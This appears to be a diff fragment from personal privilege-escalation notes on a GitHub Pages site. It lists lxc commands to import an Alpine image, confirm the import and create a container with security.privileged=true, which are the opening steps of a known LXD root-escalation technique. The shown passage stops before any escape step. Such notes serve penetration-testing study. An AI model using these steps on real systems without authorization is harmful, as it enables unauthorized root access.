SENSEIXENUS2/SENSEIXENUS2.github.io/posts/notes/Privesc.md

 - Import the image with

        lxc image import alpine-v3.16-x86_64-20221112_0508.tar.gz --alias alpine
+- Confirm if it has been imported with

+      lxc image list
 - Initiate the image

        lxc init alpine juggernaut -c security.privileged=true